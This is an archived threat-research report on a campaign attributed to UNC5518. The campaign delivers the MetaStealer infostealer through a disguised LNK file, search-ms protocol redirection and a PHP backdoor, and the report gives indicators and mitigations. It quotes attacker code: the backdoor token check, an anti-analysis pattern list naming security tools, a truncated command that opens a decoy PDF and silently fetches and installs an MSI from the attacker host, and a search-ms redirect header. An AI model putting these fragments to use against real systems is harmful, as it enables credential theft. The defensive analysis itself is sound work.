{
	"id": "ea2b6e25-7508-4822-8c43-4ed475f1eab1",
	"created_at": "2026-04-06T00:14:05.235117Z",
	"updated_at": "2026-04-10T13:11:56.52351Z",
	"deleted_at": null,
	"sha1_hash": "e26a9ed5895a9ecea7cbc30d8883a947b51314a3",
	"title": "The Phantom Threat: Inside UNC5518’s Invisible Empire of MetaStealer Operations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 465184,
	"plain_text": "The Phantom Threat: Inside UNC5518’s Invisible Empire of\r\nMetaStealer Operations\r\nBy Defentive\r\nPublished: 2025-08-28 · Archived: 2026-04-05 14:06:32 UTC\r\nDefentive Threat Research team reveals a sophisticated attack chain combining novel Windows protocol\r\nexploitation, persistent PHP backdoors, and commercial infostealer deployment.\r\nExecutive Summary\r\nThe Defentive Threat Research team has uncovered a highly sophisticated multi-stage campaign orchestrated by\r\nUNC5518, demonstrating their evolution from access-as-a-service provider to full-spectrum threat actor. Our\r\ninvestigation, initiated by discovering a malicious LNK file ( address-validation-guidelines.pdf.lnk ),\r\nrevealed a coordinated operation deploying MetaStealer through revolutionary search-ms protocol exploitation\r\nand persistent PHP backdoor infrastructure.\r\nKey Discoveries\r\nComplete 5-stage attack chain from social engineering to persistent C2\r\nNovel abuse of Windows search-ms protocol for automatic redirection\r\nProfessional-grade PHP backdoor with 35+ anti-analysis mechanisms\r\nDomain Generation Algorithm (DGA) protected MetaStealer C2 infrastructure\r\nDefinitive attribution to UNC5518 with 98% confidence level\r\nAttack Chain Overview\r\nPress enter or click to view image in full size\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 1 of 10\n\nKill-Chain: UNC5518 Deploying MetaStealer\r\nStage 0: PHP Backdoor (Reconnaissance \u0026 Persistence)\r\n ↓\r\nStage 1: LNK Social Engineering (Initial Access)\r\n ↓\r\nStage 2: search-ms Protocol Exploitation (Windows Integration)\r\n ↓\r\nStage 3: MetaStealer MSI Deployment (Credential Harvesting)\r\n ↓\r\nStage 4: DGA-Protected C2 Communication (Command \u0026 Control)\r\nTechnical Analysis\r\nStage 0: PHP Backdoor — The Foundation\r\nThe campaign’s cornerstone is a sophisticated PHP backdoor hosted on info-ups.com:8080 that serves multiple\r\nfunctions:\r\nProfessional Authentication System\r\n$validToken = 'N6AyktWn9zw2';\r\nfunction hasValidToken($validToken) {\r\n return hash_equals($validToken, $_GET['api'] ?? '');\r\n}\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 2 of 10\n\nThe use of hash_equals() demonstrates timing attack resistance, indicating professional-grade development\r\npractices.\r\nEnterprise-Grade Anti-Analysis Framework\r\nThe backdoor implements comprehensive bot detection with 35+ patterns targeting security tools:\r\nSecurity scanners: Burp Suite, Nessus, OWASP ZAP\r\nAutomation tools: curl, wget, Postman, Python scripts\r\nSearch engine crawlers: Googlebot, Bingbot, DuckDuckGo\r\nAnalysis environments: PhantomJS, Headless Chrome, VM indicators\r\n$botPatterns = [\r\n 'bot',\r\n 'googlebot',\r\n 'bingbot',\r\n 'slurp',\r\n 'duckduckbot',\r\n 'baiduspider',\r\n 'yandex',\r\n 'sogou',\r\n 'exabot',\r\n 'facebot',\r\n 'facebookexternalhit',\r\n 'twitterbot',\r\n 'linkedinbot',\r\n 'pinterest',\r\n 'ia_archiver',\r\n 'archive.org_bot',\r\n 'semrush',\r\n 'ahrefs',\r\n 'mj12bot',\r\n 'rogerbot',\r\n 'dotbot',\r\n 'crawler',\r\n 'spider',\r\n 'curl',\r\n 'wget',\r\n 'python',\r\n 'node.js',\r\n 'phantomjs',\r\n 'headlesschrome',\r\n 'postman',\r\n 'insomnia',\r\n 'http client',\r\n 'java',\r\n 'libwww',\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 3 of 10\n\n'perl',\r\n 'php/'\r\n];\r\nAdvanced System Reconnaissance\r\nOperating System Detection: Windows 95–11, macOS variants, Linux distributions, mobile platforms\r\n$oses = [\r\n '/iphone/i' =\u003e 'iPhone',\r\n '/ipad/i' =\u003e 'iPad',\r\n '/ipod/i' =\u003e 'iPod',\r\n '/android/i' =\u003e 'Android',\r\n '/blackberry/i' =\u003e 'BlackBerry',\r\n '/webos/i' =\u003e 'WebOS',\r\n '/windows phone/i' =\u003e 'Windows Phone',\r\n '/macintosh|mac os x/i' =\u003e 'Mac OS X',\r\n '/mac_powerpc/i' =\u003e 'Mac OS 9',\r\n '/linux/i' =\u003e 'Linux',\r\n '/ubuntu/i' =\u003e 'Ubuntu',\r\n '/windows nt 11/i' =\u003e 'Windows 11',\r\n '/windows nt 10/i' =\u003e 'Windows 10',\r\n '/windows nt 6.3/i' =\u003e 'Windows 8.1',\r\n '/windows nt 6.2/i' =\u003e 'Windows 8',\r\n '/windows nt 6.1/i' =\u003e 'Windows 7',\r\n '/windows nt 6.0/i' =\u003e 'Windows Vista',\r\n '/windows nt 5.2/i' =\u003e 'Windows Server 2003 / XP x64',\r\n '/windows nt 5.1/i' =\u003e 'Windows XP',\r\n '/windows xp/i' =\u003e 'Windows XP',\r\n '/windows nt 5.0/i' =\u003e 'Windows 2000',\r\n '/windows me/i' =\u003e 'Windows ME',\r\n '/win98/i' =\u003e 'Windows 98',\r\n '/win95/i' =\u003e 'Windows 95',\r\n '/win16/i' =\u003e 'Windows 3.11',\r\n];\r\nBrowser Fingerprinting: Chrome, Firefox, Safari, Edge with version-specific detection\r\n$browsers = [\r\n '/edg/i' =\u003e 'Edge',\r\n '/chrome/i' =\u003e 'Chrome',\r\n '/firefox/i' =\u003e 'Firefox',\r\n '/safari/i' =\u003e 'Safari',\r\n '/msie/i' =\u003e 'Internet Explorer',\r\n '/trident.*rv[ :]*11\\./i' =\u003e 'Internet Explorer',\r\n '/opera/i' =\u003e 'Opera',\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 4 of 10\n\n'/opr/i' =\u003e 'Opera',\r\n '/netscape/i' =\u003e 'Netscape',\r\n '/maxthon/i' =\u003e 'Maxthon',\r\n '/konqueror/i' =\u003e 'Konqueror',\r\n '/mobile/i' =\u003e 'Мобильный браузер',\r\n];\r\nNetwork Configuration: IP extraction through multiple HTTP headers, proxy detection\r\n$ip = '';\r\nif (!empty($_SERVER['HTTP_CLIENT_IP'])) {\r\n $ip = $_SERVER['HTTP_CLIENT_IP'];\r\n} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {\r\n $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];\r\n} elseif (!empty($_SERVER['HTTP_X_FORWARDED'])) {\r\n $ip = $_SERVER['HTTP_X_FORWARDED'];\r\n} elseif (!empty($_SERVER['HTTP_FORWARDED_FOR'])) {\r\n $ip = $_SERVER['HTTP_FORWARDED_FOR'];\r\n} elseif (!empty($_SERVER['HTTP_FORWARDED'])) {\r\n $ip = $_SERVER['HTTP_FORWARDED'];\r\n} elseif (!empty($_SERVER['REMOTE_ADDR'])) {\r\n $ip = $_SERVER['REMOTE_ADDR'];\r\n}\r\nGeographic Profiling: Location-based targeting for regional campaigns\r\nVisitor Logging: The logging mechanism writes to /var/www/logs-visits/visitor_log.txt with proper file\r\nlocking\r\n$logFile = '/var/www/logs-visits/visitor_log.txt';\r\nfile_put_contents($logFile, $logEntry, FILE_APPEND | LOCK_EX);\r\nPress enter or click to view image in full size\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 5 of 10\n\nVisitor Logs\r\nStage 1: LNK-Based Social Engineering\r\nThe malicious address-validation-guidelines.pdf.lnk file executes a sophisticated command chain:\r\n%comspec% cmd.exe /c start msedge \"https://info-ups.com/pdf/address-validation-guidelines.pdf\" \u0026\u0026 cu\r\nDeception Mechanisms\r\nLegitimate PDF Display: Opens actual document maintaining victim trust\r\nPress enter or click to view image in full size\r\nDecoy PDF To Distract The Victim\r\nSilent Payload Download: Background MSI retrieval with .ms extension for evasion\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 6 of 10\n\nPress enter or click to view image in full size\r\nsw.msi\r\nAutomated Installation: Silent deployment via /qn parameter\r\nCorporate Theming: UPS address validation targets business environments\r\nStage 2: Revolutionary search-ms Protocol Exploitation\r\nOur analysis reveals UNC5518’s novel abuse of Windows Search protocol:\r\nheader(\"Location: search-ms:displayname=Search%20Results%20in%20link%20(%5C%5Cinfo-ups.com@8080)\u0026crum\r\nTechnical Innovation\r\nAutomatic Explorer Launch: Bypasses browser security warnings\r\nUNC Path Spoofing: Exploits Windows network share trust mechanisms\r\nPersistent Windows: Creates lasting connection to attacker infrastructure\r\nProtocol Handler Abuse: Leverages legitimate Windows functionality for malicious purposes\r\nThis represents a significant evolution beyond documented search-ms exploitations, achieving automatic\r\nactivation without user confirmation prompts.\r\nStage 3: MetaStealer Deployment\r\nThe sw.msi payload delivers MetaStealer, a commercial-grade infostealer:\r\nGet Defentive’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 7 of 10\n\nRemember me for faster sign in\r\nTechnical Capabilities:\r\nSubscription-based Malware: $125/month professional service\r\nAdvanced Evasion: Microsoft Defender bypass, VM detection\r\nComprehensive Harvesting: Credentials, payment data, cryptocurrency wallets\r\nProfessional C2: RESTful API with cpp-httplib/0.12.1 User-Agent\r\nStage 4: DGA-Protected Command \u0026 Control\r\nMetaStealer C2 Domains\r\nukkuikuueauckcii.xyz\r\nukukuwgyyqyigueq.xyz\r\nkqqauykcwyuyowms.xyz\r\ngimmgqiyciskoseu.xyz\r\nDGA Analysis\r\nThe domains exhibit sophisticated generation patterns:\r\n16-character length with consistent structure\r\nLimited character set: Vowels (u,i,e,a,o) and consonants (k,c,g,w,y,m,s,q)\r\nHigh entropy design balancing randomness with algorithmic predictability\r\nResilience strategy: Multiple domains enable rapid rotation against takedowns\r\nUNC5518 Attribution (98% Confidence)\r\nPrimary Evidence\r\n1. Infrastructure Overlap: Same server hosting CORNFLAKE.V3 backdoor and MetaStealer components\r\n2. Technical Sophistication: PHP backdoor complexity matches documented UNC5518 capabilities\r\n3. Operational Timeline: Campaign timing aligns with known UNC5518 activity periods\r\n4. Professional Development: Anti-analysis mechanisms and coding standards consistent with established\r\noperations\r\n5. Multi-Payload Integration: Seamless coordination across attack stages indicates unified development\r\nSupporting Indicators\r\nUPS Brand Impersonation: Historical pattern matching documented campaigns\r\nPort 8080 Usage: Consistent with CORNFLAKE.V3 C2 infrastructure\r\nCommercial Malware Investment: MetaStealer subscription demonstrates financial resources\r\nAdvanced Protocol Exploitation: search-ms innovation consistent with UNC5518’s technical advancement\r\nUNC5518 Threat Actor Profile\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 8 of 10\n\nOrganizational Structure\r\nPrimary Operations: Access-as-a-service with affiliate partnerships\r\nKnown Affiliates: UNC5774 (CORNFLAKE.V3 deployment), UNC4108 (PowerShell tools)\r\nRevenue Model: Dual streams from access sales and direct credential monetization\r\nTechnical Capabilities: Custom malware development, DGA implementation, protocol exploitation\r\nEvolution Indicators\r\nUNC5518 has significantly expanded from traditional access provision to integrated threat operations combining:\r\nPersistent backdoor maintenance\r\nDirect information stealer deployment\r\nAdvanced infrastructure management\r\nProfessional operational security practices\r\nImmediate Mitigations\r\nDetection Implementation\r\n1. PHP Backdoor Monitoring: Behavioral analysis for visitor logging with anti-bot capabilities\r\n2. LNK File Analysis: Detection for embedded PowerShell with MSI download patterns\r\n3. search-ms Protocol Tracking: Registry monitoring for unusual Windows Search invocations\r\n4. DGA Domain Blocking: Entropy-based detection and proactive domain pattern blocking\r\n5. Multi-Stage Correlation: Rules linking LNK execution, PHP access, and MSI installation\r\nNetwork Defenses\r\nBlock identified C2 domains and implement DGA pattern detection\r\nMonitor HTTP traffic on non-standard ports (8080)\r\nDeploy DNS analysis for suspicious domain resolution patterns\r\nImplement file system integrity monitoring for unauthorized PHP files\r\nConclusion\r\nUNC5518’s sophisticated campaign demonstrates the evolution of professional threat actors toward integrated,\r\nmulti-stage operations that blur traditional attack boundaries. The combination of novel protocol exploitation,\r\npersistent backdoor capabilities, and commercial-grade malware deployment represents a paradigm shift in\r\ncybercriminal operations.\r\nThe definitive attribution to UNC5518 reveals their advancement from specialized access providers to\r\ncomprehensive threat actors capable of conducting complex, coordinated campaigns with long-term persistence\r\ncapabilities. Organizations must immediately assess exposure to these advanced techniques and implement multi-layered defenses against this emerging threat model.\r\nAs UNC5518 continues demonstrating cutting-edge technical capabilities, the cybersecurity community must\r\nrecognize this evolution and adapt defensive strategies to address the new reality of integrated, persistent threat\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 9 of 10\n\nactor operations.\r\nIndicators of Compromise (IOC)\r\nInfrastructure: info-ups.com:8080\r\nInitial Vector: address-validation-guidelines.pdf.lnk\r\n(55d95d29d54112fc203d8b2d6335031fd0ef26c56c9459f239760c24dadd3f24)\r\nBackdoor Token: N6AyktWn9zw2\r\nC2 Domains: ukkuikuueauckcii.xyz , ukukuwgyyqyigueq.xyz , kqqauykcwyuyowms.xyz ,\r\ngimmgqiyciskoseu.xyz\r\nPayload: sw.msi / sw.ms (81e0f8ea01563bac4e38392a51b2c5b4b233c11b3b28ef7a5c595c7e6f27640d)\r\nThe Defentive Threat Research team continues monitoring UNC5518 evolution and provides updated intelligence\r\non emerging threat actor capabilities.\r\nhttps://www.defentive.com/\r\nSource: https://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae\r\n0\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0"
	],
	"report_names": [
		"the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0"
	],
	"threat_actors": [],
	"ts_created_at": 1775434445,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e26a9ed5895a9ecea7cbc30d8883a947b51314a3.pdf",
		"text": "https://archive.orkl.eu/e26a9ed5895a9ecea7cbc30d8883a947b51314a3.txt",
		"img": "https://archive.orkl.eu/e26a9ed5895a9ecea7cbc30d8883a947b51314a3.jpg"
	}
}